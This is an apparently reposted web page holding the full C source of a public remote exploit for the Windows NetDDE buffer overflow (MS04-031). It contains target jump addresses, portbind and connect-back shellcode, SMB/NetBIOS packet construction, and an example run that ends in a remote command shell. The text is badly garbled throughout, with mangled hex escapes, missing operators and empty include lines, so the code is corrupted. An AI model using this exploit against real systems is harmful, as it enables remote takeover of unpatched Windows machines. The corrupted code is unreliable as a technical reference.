2. Tech
  3. Microsoft Windows Netdde Remote Buffer overflow Exploit (MS04-031)

Microsoft Windows Netdde Remote Buffer overflow Exploit (MS04-031)

xiaoxiao2021-03-06  42

Date: 31/12/2004

/ * HOD-MS04031-NetDDE-EXPL.C: 2004-12-30: Public V.0.2

*

* CopyRight (C) 2004 HouseOfDabus.

*

* (Ms04-031) Netdde Buffer overflow VulneRability PoC

*

*

*

*

*. :: [HouseOfDabus] ::.

*

*

*

* (Special Unstable Version)

* ------------------------------------------------- --------------------

* DESCRIPTION:

* A Remote Code Execution Vulnerability EXISTS in the netdde

* Services Because of an unchecked buffer. An Attacker Who

* SuccessFully Exploited this Vulnerability Could Take Complete

* Control of an affected system. However, The Netdde Services Are

* NOT Started by Default and Would Have to Be Manually Started for

* An Attacker to Attempt to Remotely Exploit this Vulnerability.

* This Vulnerability Could Also Be Used to Attempt To Perform

* a local elevation of privilege or remove Denial of Service.

*

* ------------------------------------------------- --------------------

* Patch:

* http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx

*

* ------------------------------------------------- --------------------

* TESTED ON:

* - Windows XP Professional SP0

* - Windows XP Professional SP1

* - Windows 2000 Professional SP2

* - Windows 2000 Professional SP3

* - Windows 2000 Professional SP4

* - Windows 2000 Advanced Server SP4

*

* ------------------------------------------------- --------------------

* This is provided as proof-of-concept code Only For Educational, ONLUCATIONAL

* purposes and testing by authorized individuals with permission to

* do so.

*

* ------------------------------------------------- --------------------

* Compile:

*

* Win32 / VC : Cl-HOD-MS04031-EXPL HOD-MS04031-Expl.c * Win32 / Cygwin: GCC -O HOD-MS04031-EXPL HOD-MS04031-Expl.c -LWS2_32.LIB

* Linux: GCC -O HOD-MS04031-EXPL HOD-MS04031-EXPL.C-WALL

*

* ------------------------------------------------- --------------------

* Command Line Parameters / Arguments:

*

* HOD-MS04031-Expl.exe

* [ConnectBack IP] [options]

*

* Targets:

* 0 [0x00abfafc]: WinXP [universal]

* 1 [0x009efb40]: win2k [universal]

*

* Options:

* -f: Netbios Name Fingerprinting

*

* ------------------------------------------------- --------------------

* EXAMPLE:

*

* C: /> HOD-MS04031-EXPL.EXE 192.168.0.1 -f

* [*] Connecting to 192.168.0.1:139 ... ok

* [*] Fingerprinting ... ok

* [ ] Remote Netbios Name: HOD

*

* C: />

* C: /> HOD-MS04031-Expl.exe 192.168.0.1 HOD 1 7878

* [*] Connecting to 192.168.0.1:139 ... ok

* [*] Attacking 192.168.0.1 ... OK.

*

* C: /> NC 192.168.0.1 7878

*

* Microsoft Windows 2000 [Version 5.00.2195]

* (C) Copyright 1985-2000 Microsoft Corp.

*

* C: / WinNT / System32>

*

* ------------------------------------------------- --------------------

* /

/ * #define _win32 * /

#include

#include

#include

#ifdef _win32

#include

#pragma comment (Lib, "WS2_32")

#ELSE

#include

#include

#include

#ENDIF

/ * Targets Table * /

Struct Targets {

Int Num;

CHAR Name [50];

Long JMPaddr;

}

Target [] = {

{0, "WinXP [Universal]", 0x00abfb1c - 0x20},

{1, "win2k [universal]", 0x009efb60 - 0x20}};

/ * portbind shellcode * /

Unsigned char portbindsc [] =

"/ XEB / X70 / X56 / X33 / XC0 / X64 / X8B / X40 / X30 / X0C / X8B / X40 / X0C"

"/ X8B / X70 / X1C / XAD / X8B / X40 / X08 / XEB / X09 / X8B / X40 / X34 / X8D / X40 / X7C / X8B"

"/ x40 / x3c / x5e / xc3 / x60 / x8b / x6c / x24 / x24 / x8b / x45 / x3c / x8b / x54 / x05 / x78"

"/ X03 / XD5 / X8B / X4A / X18 / X8B / X5A / X20 / X03 / XDD / XE3 / X34 / X49 / X8B / X34 / X8B"

"/ X03 / XF5 / XC0 / XFC / XAC / X84 / XC0 / X74 / X07 / XC1 / XCF / X0D / X03"

"/ XF8 / XEB / XF4 / X3B / X7C / X24 / X28 / X75 / XE1 / X8B / X5A / X24 / X03 / XDD / X66 / X8B"

"/ x0c / x4b / x8b / x5a / x1c / x03 / xdd / x8b / x04 / x8b / x03 / xc5 / x89 / x44 / x24 / x1c"

"/ X61 / XC3 / XEB / X3D / XAD / X50 / X52 / XE8 / XA8 / XFF / XFF / XFF / X89 / X07 / X83 / XC4"

"/ x08 / x83 / xc7 / x04 / x3b / xf1 / x75 / XEC / XC3 / X8E / X4E / X0E / XEC / X72 / XFE / XB3"

"/ x16 / x7e / xd8 / xd9 / x05 / xce / xd9 / x09 / xf5 / xad / xa4 / x1a / x70"

"/ XC7 / XA4 / XAD / X2E / XE9 / XE5 / X49 / X86 / X49 / XCB / XED / XED / X3B / XE7 / X79 / XC6"

"/ x79 / x83 / xec / x60 / x8b / Xec / XEB / X02 / XEB / X05 / XE8 / XF9 / XFF / XFF / XFF / X5E"

"/ XE8 / X3D / XFF / XFF / XFF / X8B / XD0 / X83 / XEE / X36 / X8D / X7D / X04 / X8B / XCE / X83"

"/ XC1 / X10 / XE8 / X9D / XFF / XFF / XFF / X83 / XC1 / X18 / X33 / XC0 / X66 / XB8 / X33 / X32"

"/ X50 / x68 / x77 / x73 / x32 / x5f / x8b / xdc / x51 / x52 / x53 / xff / x55 / x04 / x5a / x59"

"/ X8B / XD0 / XE8 / X7D / XFF / XFF / XFF / XB8 / X01 / X63 / X6D / X64 / XC1 / XF8 / X08 / X50"

"/ x89 / x65 / x34 / x33 / xc0 / x66 / xb8 / x90 / x01 / x2b / xe0 / x54 / x83 / xc0 / x72 / x50"

"/ XFF / X55 / X24 / X33 / XC0 / X50 / X50 / X50 / X50 / X40 / X50 / X40 / X50 / XFF / X55 / X14"

"/ X8B / XF0 / X33 / XC0 / X33 / XDB / X50 / X50 / X50 / XB8 / X02 / X01 / X11 / X5C / XFE / XCC"

"/ X50 / x8b / xc4 / xb3 / x10 / x53 / x50 / x56 / xff / x55 / x18 / x53 / x56 / xff / x55 / x1c"

"/ x53 / x8b / xd4 / x2b / x52 / x51 / x56 / xff / x55 / x20 / x8b / xf0 / x33"

"/ XC9 / XB1 / X54 / X2B / XE1 / X8B / XFC / X57 / X33 / XC0 / XF3 / XAA / X5F / XC6 / X07 / X44" "/ XFE / X47 / X2D / X57 / X8B / XC6 / X8D / X7F / X38 / XAB / XAB / XAB / X5F / X33 / XC0 / X8D "

"/ x77 / x44 / x50 / x50 / x40 / x50 / x48 / x50 / x50 / x50"

"/ XFF / X55 / X08 / XF7 / XD0 / X50 / XFF / X36 / XFF / X55 / X10 / XFF / X77 / X38 / XFF / X55"

"/ x28 / xff / x55 / x0c";

/ * Connectback shellcode * /

Unsigned char connectionbacksc [] =

"/ XEB / X70 / X56 / X33 / XC0 / X64 / X8B / X40 / X30 / X0C / X8B / X40 / X0C"

"/ X8B / X70 / X1C / XAD / X8B / X40 / X08 / XEB / X09 / X8B / X40 / X34 / X8D / X40 / X7C / X8B"

"/ x40 / x3c / x5e / xc3 / x60 / x8b / x6c / x24 / x24 / x8b / x45 / x3c / x8b / x54 / x05 / x78"

"/ X03 / XD5 / X8B / X4A / X18 / X8B / X5A / X20 / X03 / XDD / XE3 / X34 / X49 / X8B / X34 / X8B"

"/ X03 / XF5 / XC0 / XFC / XAC / X84 / XC0 / X74 / X07 / XC1 / XCF / X0D / X03"

"/ XF8 / XEB / XF4 / X3B / X7C / X24 / X28 / X75 / XE1 / X8B / X5A / X24 / X03 / XDD / X66 / X8B"

"/ x0c / x4b / x8b / x5a / x1c / x03 / xdd / x8b / x04 / x8b / x03 / xc5 / x89 / x44 / x24 / x1c"

"/ X61 / XC3 / XEB / X35 / XAD / X50 / X52 / XE8 / XA8 / XFF / XFF / XFF / X89 / X07 / X83 / XC4"

"/ x08 / x83 / xc7 / x04 / x3b / xf1 / x75 / XEC / XC3 / X8E / X4E / X0E / XEC / X72 / XFE / XB3"

"/ x16 / x7e / xd8 / xd9 / x05 / xce / xd9 / x09 / xf5 / xad / XEC / XF9 / XAA"

"/ X60 / XCB / XED / XFC / X3B / XE7 / X79 / XC6 / X79 / X83 / XEC / X60 / x8b / XEC / XEB / X02"

"/ XEB / X05 / XE8 / XF9 / XFF / XFF / XFF / X5E / XE8 / X45 / XD0 / X83"

"/ XEE / X2E / X8D / X7D / X04 / X8B / XCE / X83 / XC1 / X10 / XE8 / XA5 / XFF / XFF / XFF / X83"

"/ xc1 / x10 / x33 / xc0 / x66 / xb8 / x33 / x32 / x50 / x68 / x77 / x73 / x32 / x5f / x8b / xdc"

"/ X51 / X52 / X53 / XFF / X55 / X04 / X5A / X59 / X8B / XD0 / XE8 / X85 / XFF / XFF / XFF / XB8"

"/ X01 / x63 / x6d / x08 / x50 / x89 / x65 / x30 / x33 / xc0 / x66 / xb8 / x90"

"/ x01 / x2b / xc0 / x54 / x50 / xff / x55 / x1c / x33 / xc0 / x50 / x50 / x50"

"/ x50 / x40 / x50 / x40 / x50 / xff / x55 / x14 / x8b / xf0 / x68 / x7f / x01 / x01 / x01 / xb8" "/ x02 / x01 / x11 / x5c / xfe / xcc / x50 / X8B / XDC / X33 / XC0 / XB0 / X10 / X50 / X53 / X56 "

"/ XFF / X55 / XB1 / X54 / X2B / XE1 / X8B / XFC / X57 / X33 / XC0 / XF3 / XAA"

"/ X5F / XC6 / X07 / X44 / XFE / X47 / X2D / X57 / X8B / XC6 / X8D / X7F / X38 / XAB / XAB / XAB"

"/ X5F / X33 / XC0 / X8D / X77 / X44 / X56 / X57 / X50 / X50 / X50 / X40 / X50" "

"/ XFF / X75 / X30 / X50 / XFF / X55 / X08 / XF7 / XD0 / X50 / XFF / X36 / XFF / X55 / X10 / XFF"

"/ x77 / x38 / xff / x55 / x20 / xff / x55 / x0c";

#define set_portbind_port (buf, port) * (unsigned

Short *) ((BUF) 300)) = (port)

#define set_connectback_ip (buf, ip) * (unsigned

Long *) ((buf) 283)) = (ip)

#define set_connectback_port (buf, port)

* (unsigned short *) ((BUF) 290)) = (port)

/ *

EAX = target []. jmpaddr -> stack -> jmpcode -> shellcode

1. 0100D605 Call DWORD PTR [EAX 20H]

2. JMPCode

3. Shellcode

* /

Char jmpcode [] =

"/ x90 / x90 / x81 / xc7 / x20 / x03 / xff / x-x90 / x90 / x90 / x90"

"/ x50 / x6f / x43 / x20 / x20 / x4e / x65 / x74 / x44 / x44 / x45 / x20 / x28"

"/ x4d / x53 / x30 / x33 / x31 / x29 / x2e / x20 / x43 / x6f / x70 / x79 / x72"

"/ x69 / x20 / x28 / x63 / x29 / x20 / x32 / x30 / x30 / x34 / x2d / x32 / x30"

"/ x30 / x35 / x20 / x68 / x6f / x75 / x73 / x65 / x6f / x66 / x64 / x61 / x62 / x75 / x73 / x2e"

"/ xbb / xbb / xbb / xbb" / * => EAX * /

"Padpad";

Char SMB_SESREQ [] =

"/ x81 / x00 / x00 / x4b / x46 / x44 / x45 / x4e / x45 / x43 / x46 / x44 / x45"

"/ x46 / x46 / x43 / x46 / x46 / x43 / x43 / x41 / x43 / x41 / x43 / x41 / x43"

"/ x41 / x43 / x00 / x20 / x45 / x4b / x45 / x44 / x46 / x45 / x45 / x49 / x45"

"/ x44 / x43 / x41 / x43 / x41 / x41 / x43 / x41 / x43 / x41 / x43 / x41 / x43"

"/ x41 / x43 / x41 / x43 / x41 / x41 / x41 / x00"; char SMB_NEGOTIATE [] =

"/ x00 / x00 / x00 / x2f / x42 / x72 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x5c / x02"

"/ x00 / x00 / x00 / x00 / x00 / x0c / x00 / x02 / x4e / x54 / x20 / x4c / x4d / x20 / x30 / x2e"

"/ x31 / x32 / x00";

Char D1 [] =

"/ X0D / X12 / X0B / X06 / X0D / X18 / X1C / X01 / X10 / X03 / X12 / X08 / X1D / X1F / X0A / X0A"

"/ x16 / x02 / x17 / x0e / x1b / x0d";

Char req1 [] =

"/ x81 / x00 / x00 / x44";

Char req2 [] =

"CacacacacacacacacAcacacAbp";

Char H1 [] =

"/ x45 / x44 / x44 / x4e / x00 / x00 / x00";

Char H2 [] = =

"/ x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00";

Char H3 [] =

"/ x00 / x00 / x02 / x02 / x00 / x00 / x00 / x01 / x00 / x00 / x00";

Unsigned long ndlen = 0;

Unsigned long ntarget = 0;

Unsigned long backip = 0;

Unsigned short bindport = 0;

Unsigned long

FIXX (unsigned char * data, unsigned long i)

{

Unsigned long LEN;

LEN = (Data [i 3] << 24)

(Data [i 2] << 16)

(DATA [i 1] << 8)

(DATA [I]);

Return Len;

}

Unsigned long

Chksum (unsigned char * data, unsigned long dlen)

{

UNSIGNED Long i, Len;

Unsigned long chk;

CHK = 0xfffffff;

Len = DLEN - 4;

For (i = 0; i

CHK = FIXX (Data, I);

While (i

CHK = (unsigned char) data [i];

i ;

}

Return Chk;

}

Char *

NetBIOS_ENCODE (Char * NData, Char Service)

{

Char * TmpData, * Data, * nret

Unsigned long dlen;

Char ODIV, OMOD, O;

INT I;

DATA = (char *) Calloc (17, 1);

Memcpy (Data, NData, Strlen (NDATA);

DLEN = Strlen (data);

While (DLEN <15) {

STRCAT (DATA, "/ X20");

DLEN ;

}

Memcpy (Data Strlen (DATA), & Service, 1); NRET = (CHAR *) Calloc (Strlen (DATA) * 2 1, 1);

TMPDATA = NRET;

For (i = 0; i <16; i ) {

o = (char) DATA [I];

ODIV = O / 16;

ODIV = ODIV 0x41;

omod = O% 16;

omod = omod 0x41;

* TMPDATA = ODIV;

* TMPDATA = omod;

}

Free (DATA);

Return nret;

}

unsigned char *

Find_smbname (unsigned char * data, unsigned long le

{

UNSIGNED Char * PTR;

Unsigned long i = 0;

PTR = DATA;

PTR = 91;

While (i <= le - 3) {

IF (PTR [I] == '/ x00')

IF (PTR [i 1] == '/ x00')

IF (PTR [i 2] == '/ x00')

RETURN PTR I 3;

i ;

}

Return NULL;

}

/ * fingerprinting * /

unsigned char *

SMB_GET_NAME (Char * IP)

{

Int Sock, R;

UNSIGNED Long Smbname_len;

Unsigned char * name = null, * SMBNAME;

Struct socketdr_in s;

Struct hostent * he;

UNSIGNED Char BUF [256];

IF ((He = gethostByName (IP)) == null) {

Printf ("[-] Unable to Resolve% S / N", IP);

Return NULL;

}

SOCK = Socket (AF_INET, SOCK_STREAM,

Ipproto_tcp);

IF (SOCK <0) Return NULL;

S.sin_family = af_INET;

S.SIN_ADDR = * (Struct In_Addr *) HE-> H_ADDR);

S.sin_port = HTONS (139);

MEMSET (& (S.SIN_ZERO), '/ 0', 8);

MEMSET (BUF, 0, 256);

Printf ("[*] Connecting TO% S: 139 ...", IP);

R = Connect (Sock, (Struct SockAddr *) & S, Sizeof (Struct

SockAddr_in));

IF (r == 0) {

Printf ("OK / N [*] fingerprinting ...");

/ * Sending session request * /

Send (Sock, SMB_SESREQ, SIZEOF (SMB_SESREQ) -1,

0);

Sleep (1000);

R = Recv (SOCK, (CHAR *) BUF, 256, 0);

IF (r <0) goto err;

MEMSET (BUF, 0, 256); / * Sending Negotiation Request * /

Send (Sock, SMB_NEGOTIATE,

SizeOf (SMB_NEGOTIATE) -1, 0);

Sleep (1000);

R = Recv (SOCK, (CHAR *) BUF, 256, 0);

IF (r <0) goto err;

Printf ("ok / n");

SMBNAME = Find_smbname (BUF, R);

IF (SMBNAME == null) goto err;

SMBNAME_LEN = SMBNAME - BUF;

Name = (unsigned char *) Calloc (SMBNAME_LEN,

1);

/ * decoding * /

R = 0;

While (SMBNAME_LEN) {

IF (* SMBNAME! = '/ x00') {

Name [R] = * SMBNAME;

R ;

}

SMBNAME ;

SMBNAME_LEN -;

}

} else {

Printf ("Failed / N [-] Can't Connect TO% S: 139 / N", IP);

}

Err:

Shutdown (SOCK, 1);

CloseSocket (SOCK);

Return Name;

}

/ * NetDDE Packet * /

Char *

Packet_assembly (char * name, char * host)

{

Char * main, * header, * data;

Char * lname, * rhost

Unsigned long Llen, Rlen, Len, Hlen, DLEN, CSUM, I

Unsigned char name_hi, name_low, rhost_hi,

Rhost_low;

Unsigned char hod_hi, hod_low, len_hi, len_low;

Unsigned char nops [] = "/ x90 / x90 / x90 / x90"; / * nops * /

Char hod [] = "hod-hod / x01";

CHAR HMAIN [] = "/ x01 / x00 / x00 / x00";

CHAR TMP [8];

Llen = Strlen (Name) 4;

Rlen = Strlen (Host);

Lname = (char *) Calloc (Llen 3, 1);

Rhost = (char *) Calloc (rlen 3, 1);

Memcpy (LNAME, NAME, LLEN);

STRCPY (rhost, host);

Memcpy (LName Llen, "/ X01", 1);

STRCAT (RHOST, "/ X01");

Name_hi = (unsigned char) ((Llen 1) / 256);

Name_low = (unsigned char) ((Llen 1)% 256);

Rhost_hi = (unsigned char) ((RLEN LLEN 2) / 256);

Rhost_low = (unsigned char) ((RLEEN LLEN 2)% 256);

Len = SizeOf (HOD) - 1;

HOD_HI = (unsigned char) (LEN / 256); hod_low = (unsigned char) (len% 256);

Main = (char *) Calloc (SIZEOF (HOD) -1

Sizeof (hmain) -1

Llen Rlen

11, 1);

Memcpy (Main, Hmain, SizeOf (Hmain) - 1);

Sprintf (TMP, "% C% C% C% C% C% C", Name_hi, Name_LOW,

RHOST_HI, RHOST_LOW, HOD_HI, HOD_LOW;

Memcpy (Main SizeOf (Hmain) -1, TMP, 6);

Memcpy (MAIN SIZEOF (Hmain) -1 6, "/ X00", 1);

Memcpy (main sizeof (hmain) -1 7, lname, llen 1);

Memcpy (MAIN SIZEOF (Hmain) -1 7 Llen 1, RHOST,

RLEN 1);

Memcpy (main sizeof (hmain) -1 7 Llen 1 RLlen 1, HOD,

SizeOf (HOD) -1);

Memcpy (MAIN SIZEOF (HMAIN) -1 7 Llen 1 RLEN 1 SIZEOF (HOD) -1,

"/ x2e", 1);

Len =

SizeOf (Hmain) -1 7 Llen 1 RLEN 1 SIZEOF (HOD) -1 1;

Len_hi = (unsigned char) (len / 256);

LEN_LOW = (unsigned char) (len% 256);

/ * Header * /

Header = (char *) Calloc (Sizeof (H1) -1

SizeOf (H2) -1

Sizeof (H3) -1

9, 1);

Memcpy (HEADER, H1, SIZEOF (H1) -1);

Sprintf (TMP, "% C% C", len_hi, len_low);

Memcpy (HEADER SIZEOF (H1) -1, TMP, 2);

Memcpy (Header SizeOf (H1) -1 2, H2, SizeOf (H2) -1);

Memcpy (HEADER SIZEOF (H1) -1 2 SizeOf (H2) -1, TMP, 2);

Memcpy (Header SizeOf (H1) -1 2 SizeOf (H2) -1 2, H3,

SizeOf (h3) -1);

Csum = chksum (main, len);

Memcpy (HEADER SIZEOF (H1) -1 SizeOf (H2) -1 4

SizeOf (H3) -1, & CSum, 4);

/ * data * /

HLEN = SizeOf (H1) -1 SizeOf (H2) -1 SizeOf (H3) -1 8;

Data = (char *) Calloc (Sizeof (D1) -1

LEN HLEN

37

1200, 1);

Csum = Chksum (Header, HLEN);

Memcpy (DATA 4, & CSUM, 4);

Memcpy (Data 4 4, Header, HLEN); Memcpy (Data 4 4 Hlen, Main, Len);

Memcpy (DATA 4 4 HLEN LEN, D1, SIZEOF (D1) -1);

/ * NOPS * /

For (i = 0; i <154; i )

Memcpy (DATA 4 4 HLEN LEN SIZEOF (D1) -1 i * 4,

NOPS, 4);

/ * shellcode * /

IF (! backip) {

/ * portbind * /

SET_PORTBIND_PORT (portbindsc,

Htons (bindport));

Memcpy (DATA 4 4 HLEN LEN SIZEOF (D1) -1 154 * 4,

Portbindsc, SizeOf (portbindsc) -1);

Dlen =

4 HLEN LEN SIZEOF (D1) -1 SizeOf (portbindsc) -1 154 * 4;

} else {

/ * Connectback * /

SET_CONNECTBACK_IP (ConnectBacksc,

BACKIP);

SET_CONNECTBACK_PORT (ConnectBacksc,

Htons (bindport));

Memcpy (DATA 4 4 HLEN LEN SIZEOF (D1) -1 154 * 4,

ConnectBacksc, SizeOf (ConnectBacksc) -1);

Dlen =

4 HLEN LEN SIZEOF (D1) -1 SizeOf (ConnectBacksc) -1 154 * 4;

}

NDLEN = DLEN 4;

DLEN = HTONL (DLEN);

Memcpy (Data, & DLEN, 4);

Free (LNAME);

Free (rhost);

Free (main);

FREE (header);

Return Data;

}

Void

USAGE (Char * PROG)

{

INT I;

Printf ("% s

[CONNECTBACK IP] [Options] / n / n ", prOg;

Printf ("Targets: / N");

For (i = 0; i <2; i )

Printf ("% d [0x% .8x]:% s / n", target [i] .num,

Target [i] .jmpaddr, target [i] .name);

Printf ("/ NOPTIONS: / N / T-F: Netbios Name Fingerprinting / N");

exit (0);

}

Void

Vargs (int Argc, char ** argv)

{

INT I, Finger = 0;

Char * nname = null;

For (i = 2; i

IF (argv [i] [0] == '-') {

IF (Argv [i] [1] == 'f')

Finger = 1;

}

}

IF (Finger && Argc> 2) {

NNAME = SMB_GET_NAME (Argv [1]); if (nname) {

Printf ("[ ] Remote NetBIOS Name:% S / N",

NName);

Free (nName);

}

exit (0);

Else

IF (Argc <5) USAGE (Argv [0]);

IF ((Ntarget = ATOI (Argv [3]))> 1) USAGE (Argv [0]);

Bindport = (unsigned short) ATOI (Argv [4]);

IF (Argc> 5) backip = inet_addr (argv [5]);

Return;

}

int

Main (int Argc, char ** argv)

{

INT LEN, SOCKFD;

Char * host;

CHAR * REQ;

Struct hostent * he;

Struct SockAddr_in their_addr;

Char rbuf [4096];

#ifdef _win32

WSADATA WSA;

#ENDIF

Char * sees_req;

CHAR * DATA, * HNAME;

CHAR * HN, * HN2;

Unsigned long req_sz, hname_len, hn_len;

#ifdef _win32

WSASTARTUP (Makeword (2,0), & WSA);

#ENDIF

Printf ("/ N (ms04-031) NetDDE Buffer overflow

Vulnerability poc / n / n ");

Printf ("/ TcopyRight (C) 2004-2005. :: [HouseOfdabus

] :: ./ n / n / n ");

VARGS (Argc, Argv);

HN = argv [2]; / * Target Netbios Name * /

Host = argv [1]; / * Target host name * /

IF (Strlen> 1024) Return 0;

/ * Target JmpAddr * /

Memcpy (JMPcode 80, & target [Ntarget] .jmpaddr, 4);

SES_REQ = (char *) Calloc (SizeOf (Req1) -1

SIZEOF (Req2) -1

114, 1);

Memcpy (ses_req, req1, sizeof (req1) -1);

Memcpy (SES_REQ SIZEOF (Req1) -1, "/ X20", 1);

HNAME = NetBIOS_ENCODE (HN, 0x1F);

HNAME_LEN = Strlen (HNAME);

Memcpy (SES_REQ SIZEOF (Req1) -1 1, HNAME,

HNAME_LEN);

Memcpy (SES_REQ SIZEOF (Req1) -1 1 HNAME_LEN,

"/ x00 / x20", 2);

Memcpy (SES_REQ SIZEOF (Req1) -1 1 HNAME_LEN 2,

REQ2, SIZEOF (REQ2) -1);

Memcpy (SES_REQ SIZEOF (REQ1) -1 1 HNAME_LEN 2 SIZEOF (Req2) -1,

"/ x00", 1);

REQ_SZ =

SIZEOF (REQ1) -1 SizeOf (Req2) -1 HNAME_LEN 4;

IF ((he = gethostByname (Host)) == null) {printf ("[-] unable to resolve% s / n", host);

Return 0;

}

IF ((Sockfd = Socket (AF_INET, SOCK_STREAM, 0)) <

0) {

Printf ("[-] error: socket failed / n");

Return 0;

}

REQ = Req1;

THEIR_ADDR.SIN_FAMILY = AF_INET;

THEIR_ADDR.SIN_PORT = HTONS (139);

THEIR_ADDR.SIN_ADDR = * (Struct In_Addr *) He-> h_addr);

MEMSET (& (THEIR_ADDR.SIN_ZERO, '/ 0', 8);

/ * connection * /

Printf ("[*] Connecting TO% S: 139 ...", Host);

IF (Connect (Sockfd, (Struct SockAddr *) & their_addr,

SIZEOF (STRUCT SOCKADDR)) <0) {

Printf ("[-] error: connect filed / n");

Return 0;

}

Printf ("ok / n");

IF (SEND (SOCKFD, SES_REQ, REQ_SZ, 0) <0) {

Printf ("[-] error: send failed / n");

Return 0;

}

Len = Recv (Sockfd, RBUF, 4096, 0);

IF (len <0) Return 0;

/ * check netdde * /

IF (UNSIGNED Char) RBUF [0]! = 0x82) {

Printf ("[-] netdde disabled or wrong netbios

Name / N ");

Return 0;

}

HN2 = (char *) Calloc (16, 1);

Memcpy (HN2, HN, Strlen (HN));

HN_LEN = Strlen (HN);

While (HN_LEN <15) {

STRCAT (HN2, "/ X20");

HN_LEN ;

}

/ * attacking * /

Printf ("[*] attacking% s ...", host);

Data = packet_assembly (jmpcode, hn2);

IF (SEND (SOCKFD, DATA, NDLEN, 0) <0) {

Printf ("/ n [-] error: send failed / n");

Return 0;

}

Printf ("ok./n");

Len = Recv (Sockfd, RBUF, 4096, 0);

Shutdown (sockfd, 1);

CloseSocket (SOCKFD);

Free (DATA);

Free (hn2);

Free (SES_REQ);

Free (HNAME);

Return 0;

}

转载请注明原文地址:https://www.9cbs.com/read-74131.html

9cbs

New Post(0)